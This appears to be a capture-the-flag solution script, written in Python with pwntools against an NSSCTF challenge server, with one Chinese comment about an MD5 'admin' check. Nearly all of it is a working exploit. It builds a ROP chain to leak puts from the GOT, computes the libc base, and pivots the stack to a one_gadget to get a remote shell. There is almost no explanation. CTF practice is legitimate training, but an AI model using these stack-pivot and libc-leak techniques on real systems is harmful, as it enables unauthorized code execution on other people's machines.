第二个验证竟然是 md5 算法,得输入 admin 字符串
from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
def s(a):
p.send(a)
def sa(a, b):
p.sendafter(a, b)
def sl(a):
p.sendline(a)
def sla(a, b):
p.sendlineafter(a, b)
def r():
p.recv()
def pr():
print(p.recv())
def rl(a):
return p.recvuntil(a)
def inter():
p.interactive()
def debug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('node4.anna.nssctf.cn', 28976)
elf = ELF('./pwn')
#libc = ELF('./libc-2.27-x64.so')
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
leave = 0x40098e
ret = 0x400641
rdi = 0x401ab3
rsi_r15 = 0x401ab1
buf = 0x602400
#gdb.attach(p, 'b *0x401973')
# leak libc_base
sa(b'>', b'admin\x00\x00\x00' + p64(rdi) + p64(elf.got['puts']) + p64(0x4018B5))
sa(b'>', b'admin\x00'.ljust(0x20, b'\x00') + p64(buf))
libc_base = get_addr() - libc.sym['puts']
print(' libc_base -> ', hex(libc_base))
# pwn
system, binsh = get_sb()
one_gadget = libc_base + 0x4527a
sa(b'>', b'admin\x00\x00\x00' + p64(0)*2 + p64(one_gadget))
sa(b'>', b'admin\x00\x00\x00'*4)
inter()
#pause()